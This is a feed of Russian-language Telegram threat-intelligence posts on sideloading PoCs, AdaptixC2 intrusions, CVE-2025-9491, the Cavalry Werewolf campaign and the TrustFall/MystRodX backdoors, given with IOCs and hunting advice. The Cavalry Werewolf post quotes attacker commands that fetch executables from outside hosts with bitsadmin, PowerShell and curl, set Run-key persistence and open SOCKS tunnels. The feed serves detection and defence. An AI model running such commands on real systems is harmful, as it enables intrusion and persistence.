Когда исследование превращается в боевую игрушку - одни выкладывают PoC, другие - уже катают это в реальных кампаниях. 👿
🤓 Началось всё с обычного ISO - на вид ничего криминального, но внутри прятался обфусцированный шеллкод. Механика старая, но рабочая: DLL-sideloading - легитимный процесс подхватывает "чужую" DLL, та разворачивает payload и инжектит код в RuntimeBroker.exe. Это именно тот сценарий, о котором пишут в статье.
Авторы разобрали ISO, расшифровали XOR-обфускацию и описали, как код оживает в памяти. По сути - нормальная исследовательская работа: показать, как метод работает и какие артефакты остаются после исполнения.
Дальше - самое неприятное.🚬
Проект с исходниками (DLL + отладочный EXE) попал в публичный репозиторий, и рядом с исходниками остались PDB-метки вроде OneDriveUpdaterSideloading. Эти метки - мелочь, но для кого-то достаточно, чтобы собрать тот же бинарь и использовать его в реальной атаке.
Не прошло и много времени, собранный из репо DLL практически идентичен тому, что потом нашли "в поле". Разница - символическая: в XOR-ключ добавили букву "s" и все, логика осталась та же.
😰 То есть взяли PoC, слегка поправили и запустили.
Ещё момент - инструментарий. В одних инцидентах исследователи/атаки шли через BruteRatel, в других - через Cobalt Strike. Суть не в тулзе, а суть в том, что рабочая техника - готовая деталь, которую можно вставлять в любой C2-набор.
Авторы в материале показывают скриншоты декодирования шеллкода, сравнение версий DLL/EXE и описание того, как из "учебного" репо получается боевой бинарь. Там же есть упоминания про наблюдаемые IP и гибкие C2-профили - пример конкретного "маячка" в тексте: 193.37.x[.]x. Это не художественный вымысел - это реальные следы, которые складываются в картинку.🙂
☄️ Вывод простой и немного жесткий: публикация рабочего PoC с метаданными - это подарок для того, кто умеет быстро собрать и адаптировать. Исследование должно помогать защитникам, а не давать готовые рецепты для злоумышленников.
Если коротко - учись, показывай результат, но думай, что выкладываешь в паблик: PDB-строки, готовые бинарники и явные инструкции облегчают превращение исследования в оружие. И да, эта история - как раз про то, что один коммит может иметь далекоидущие последствия.🤫
🔗 https://www.ctfiot.com/134357.html
🐦⬛ DFIR Father
Авторы разобрали ISO, расшифровали XOR-обфускацию и описали, как код оживает в памяти. По сути - нормальная исследовательская работа: показать, как метод работает и какие артефакты остаются после исполнения.
Дальше - самое неприятное.
Проект с исходниками (DLL + отладочный EXE) попал в публичный репозиторий, и рядом с исходниками остались PDB-метки вроде OneDriveUpdaterSideloading. Эти метки - мелочь, но для кого-то достаточно, чтобы собрать тот же бинарь и использовать его в реальной атаке.
Не прошло и много времени, собранный из репо DLL практически идентичен тому, что потом нашли "в поле". Разница - символическая: в XOR-ключ добавили букву "s" и все, логика осталась та же.
Ещё момент - инструментарий. В одних инцидентах исследователи/атаки шли через BruteRatel, в других - через Cobalt Strike. Суть не в тулзе, а суть в том, что рабочая техника - готовая деталь, которую можно вставлять в любой C2-набор.
Авторы в материале показывают скриншоты декодирования шеллкода, сравнение версий DLL/EXE и описание того, как из "учебного" репо получается боевой бинарь. Там же есть упоминания про наблюдаемые IP и гибкие C2-профили - пример конкретного "маячка" в тексте: 193.37.x[.]x. Это не художественный вымысел - это реальные следы, которые складываются в картинку.
Если коротко - учись, показывай результат, но думай, что выкладываешь в паблик: PDB-строки, готовые бинарники и явные инструкции облегчают превращение исследования в оружие. И да, эта история - как раз про то, что один коммит может иметь далекоидущие последствия.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥4 3 1
Forwarded from s0ld13r ch. (s0ld13r)
И снова стилеры, и снова здравствуйте 😃
Исследуя логи стилеров и ULP, можно наткнуться на интересную строчку malware_path (в частности в API сервиса Hudsonrock), как можно понять из названия это поле где находился вредонос на атакованном хосте🫢
Эту фичу можно выгодно использовать для Threat Hunting: часто файлы подкидывают в предсказуемые места и можно обогатить hunting queries. В нашем случае - стандартный .NET-путь.🥺
🛡 Query
Больше про использование данных с теневых ресурсов можно почитать тут
🧢 s0ld13r
Исследуя логи стилеров и ULP, можно наткнуться на интересную строчку malware_path (в частности в API сервиса Hudsonrock), как можно понять из названия это поле где находился вредонос на атакованном хосте
Эту фичу можно выгодно использовать для Threat Hunting: часто файлы подкидывают в предсказуемые места и можно обогатить hunting queries. В нашем случае - стандартный .NET-путь.
event.code: 11 and file.path: *Microsoft.NET\\Framework\\v4.0.30319* and file.extension: exe
Больше про использование данных с теневых ресурсов можно почитать тут
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍4
Forwarded from README.hta
Давеча в одном из кейсов встретили постэксплуатационный фреймворк AdaptixC2. Что-то новенькое itw!
Кратко накину контекст, я думаю, вы поймете, почему:
adrecon, sharphound →
fscan →
rdp, psexec, obfuscated powershell, winrm →
cobalt strike →
RMM (AnyDesk, RMS, Mesh Agent, TacticalRMM) →
nuget, devtunnel, chisel →
adaptixc2 via nssm →
dll w/ telegram c2 channel →
sliver
Все приправлено кастомным шифровальщиком через GPO. И это даже не очередной экземпляр LockBit 🏴
Самое интересное — здесь: https://habr.com/ru/companies/angarasecurity/articles/962088/
Кратко накину контекст, я думаю, вы поймете, почему:
proxyshell → adrecon, sharphound →
fscan →
rdp, psexec, obfuscated powershell, winrm →
cobalt strike →
RMM (AnyDesk, RMS, Mesh Agent, TacticalRMM) →
nuget, devtunnel, chisel →
adaptixc2 via nssm →
dll w/ telegram c2 channel →
sliver
Все приправлено кастомным шифровальщиком через GPO. И это даже не очередной экземпляр LockBit 🏴
Самое интересное — здесь: https://habr.com/ru/companies/angarasecurity/articles/962088/
Хабр
Не Cobalt Strike и не Brute Ratel: почему злоумышленники выбрали AdaptixC2 и как его обнаружить
В сентябре 2025 года исследователи из Angara MTDR обнаружили, что фреймворк AdaptixC2 стал использоваться в атаках на организации в Российской Федерации. Сегодня мы, Лада Антипова и Александр...
❤5
Forwarded from SecuriXy.kz
CVE-2025-9491 (ZDI-CAN-25373) - Непатченная уязвимость Windows в активной эксплуатации (PlugX)
Суть уязвимости:
Критическая уязвимость в обработке Windows LNK файлов (ярлыков). Позволяет скрывать вредоносные аргументы командной строки в поле Target через добавление пробелов, делая их невидимыми в стандартном UI Windows.
История эксплуатации:
Активно используется APT группами из КНДР, Ирана, России, Китая с 2017 года
Публично раскрыта Trend Micro ZDI в марте 2025
Текущая кампания (сентябрь-октябрь 2025):
Атрибуция: UNC6384
Цели: дипломатические структуры ЕС (Венгрия, Бельгия, Италия, Нидерланды) и авиационные департаменты правительства Сербии
Вектор атаки:
Spearphishing с встроенным URL,
Доставка вредоносных LNK файлов (темы: встречи Еврокомиссии, семинары НАТО),
Запуск обфусцированных PowerShell команд, Многоступенчатая цепочка заражения,
Развертывание PlugX RAT через DLL side-loading легитимных утилит Canon
Позиция Microsoft :-)
Уязвимость зарегистрирована ZDI в сентябре 2024, Microsoft отказалась выпускать патч, считая что не соответствует критериям обслуживания
Предлагаемая защита: Microsoft Defender + Smart App Control и возможно исправление в будущих feature релизах
Индикаторы компрометации:
LNK файлы с аномально длинным Target полем
DLL side-loading через cnmpaui.exe, cnmpauix.exe, cnmplog.dat
HTA файлы с загрузкой JS с CloudFront URL
Инфраструктура C2 на базе CloudFront
Рекомендации:
Блокировка LNK файлов на периметре
Мониторинг аномальных запусков PowerShell через LNK
Контроль DLL side-loading легитимных процессов
Анализ исходящих подключений к CloudFront CDN
https://github.com/advisories/GHSA-6rf6-f9qg-8v94
Суть уязвимости:
Критическая уязвимость в обработке Windows LNK файлов (ярлыков). Позволяет скрывать вредоносные аргументы командной строки в поле Target через добавление пробелов, делая их невидимыми в стандартном UI Windows.
История эксплуатации:
Активно используется APT группами из КНДР, Ирана, России, Китая с 2017 года
Публично раскрыта Trend Micro ZDI в марте 2025
Текущая кампания (сентябрь-октябрь 2025):
Атрибуция: UNC6384
Цели: дипломатические структуры ЕС (Венгрия, Бельгия, Италия, Нидерланды) и авиационные департаменты правительства Сербии
Вектор атаки:
Spearphishing с встроенным URL,
Доставка вредоносных LNK файлов (темы: встречи Еврокомиссии, семинары НАТО),
Запуск обфусцированных PowerShell команд, Многоступенчатая цепочка заражения,
Развертывание PlugX RAT через DLL side-loading легитимных утилит Canon
Позиция Microsoft :-)
Уязвимость зарегистрирована ZDI в сентябре 2024, Microsoft отказалась выпускать патч, считая что не соответствует критериям обслуживания
Предлагаемая защита: Microsoft Defender + Smart App Control и возможно исправление в будущих feature релизах
Индикаторы компрометации:
LNK файлы с аномально длинным Target полем
DLL side-loading через cnmpaui.exe, cnmpauix.exe, cnmplog.dat
HTA файлы с загрузкой JS с CloudFront URL
Инфраструктура C2 на базе CloudFront
Рекомендации:
Блокировка LNK файлов на периметре
Мониторинг аномальных запусков PowerShell через LNK
Контроль DLL side-loading легитимных процессов
Анализ исходящих подключений к CloudFront CDN
https://github.com/advisories/GHSA-6rf6-f9qg-8v94
🔥3👍2
Интересный разбор про Комрад Сайгу 🦌
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
Cavalry Werewolf: целевая атака на госсектор РФ
⚙️ Формат атаки
🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS).
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
🧠 Цели и действия атакующего
Атакующие проводят ручную разведку через cmd.exe:
Загружают новые модули через PowerShell и curl:
🧩 Инструменты Cavalry Werewolf
BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang),
Trojan.Inject5.57968 — инжект в
Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в
⛓️💥Типовая цепочка действий
1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл).
2️⃣ Разведка: whoami / ipconfig / net user.
3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl.
4️⃣ Закрепление через Run-ключ или планировщик.
5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe.
6️⃣ Создание туннелей и Telegram-C2.
7️⃣ Эксфильтрация документов, удаление следов.
🧠 Тактические наблюдения
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка:
Хранение и запуск из
Переход от разведки к туннелям и долговременному C2 в одном цикле.
🔍 Что отслеживать
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на
• Трафик к api.telegram.org или подозрительным IP
🔗 https://news.drweb.ru/show/?i=15078
🦔 THF
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe
Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php.Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
Атакующие проводят ручную разведку через cmd.exe:
whoami
ipconfig /all
net user
dir C:\Users\<user>\Downloads
dir C:\Users\Public\Pictures
Проверяют сетевые прокси:[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")Загружают новые модули через PowerShell и curl:
powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe"
curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe
Закрепление через Run-ключ:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f
Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe.BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang),
revv2.exe -connect IP:10443.Trojan.Inject5.57968 — инжект в
aspnet_compiler.exe, шифрование RC2 / AES, C2.Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в
%APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах.⛓️💥Типовая цепочка действий
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка:
bitsadmin → powershell → cmd.exe.Хранение и запуск из
C:\Users\Public\Pictures|Libraries|Downloads.Переход от разведки к туннелям и долговременному C2 в одном цикле.
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на
C:\Users\Public\.• Трафик к api.telegram.org или подозрительным IP
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥3
Forwarded from Threat Hunting Father 🦔
Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигурируют два связанных инструмента — TrustFall и MystRodX.
Они отдельно отметили, что о схожем вредоносе ранее писали аналитики QAX (@RedDrip7), которые использовали название MystRodX для такого же типа атаки.
По данным ГТС, это звенья одной кампании, наблюдавшейся в 2025 году.
Лёгкий backdoor: выполняет команды через
/bin/sh, пакует данные (tar -czvf), удаляет следы (rm -rf) и отправляет информацию через POST на /news/data_form.php. Использует фиксированные C2 и позже — шифрование.Более новая стадия той же линии: обновлённый модуль с другим форматом сетевого обмена, зашифрованным трафиком и расширенной C2-инфраструктурой. Распространялся через
139.84.156.79.185.154.154.135
213.159.64.6
2.56.177.181
37.221.125.201
5.252.22.232
45.14.244.110
45.83.140.218
154.196.162.76
Сервер распространения139.84.156.79
Конфигурационные файлыtcbipkrn.config → 185.154.154.135
baeeajzb.config → 213.159.64.6
URI/news/data_form.php
Поведенческие признакиtar -czvf
rm -rf
/bin/sh -c "<command>"
шифрование трафика (в поздней активности)
смена канала управления
STA-2201
Группа, впервые замеченная в 2019, работает по двум направлениям:
• Initial Access Broker (первичный доступ)
• Классическая APT-активность: кража и эксфильтрация данных
Позже стала действовать более скрытно.
Сектора: госуправление, телеком.
STA-2404
Продвинутая хакерская группа, образованная после структурных изменений (детали скрыты).
Активность отслеживается с 2024 года (две волны).
Сектора: госуправление, энергетика, здравоохранение, наука, транспорт, финансы.
• Презентация: https://profitday.kz/pdf/security2025/15.pdf
• sts.kz
• Запись выступления: https://www.youtube.com/live/8eueDGkMMlo?t=26395
•https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1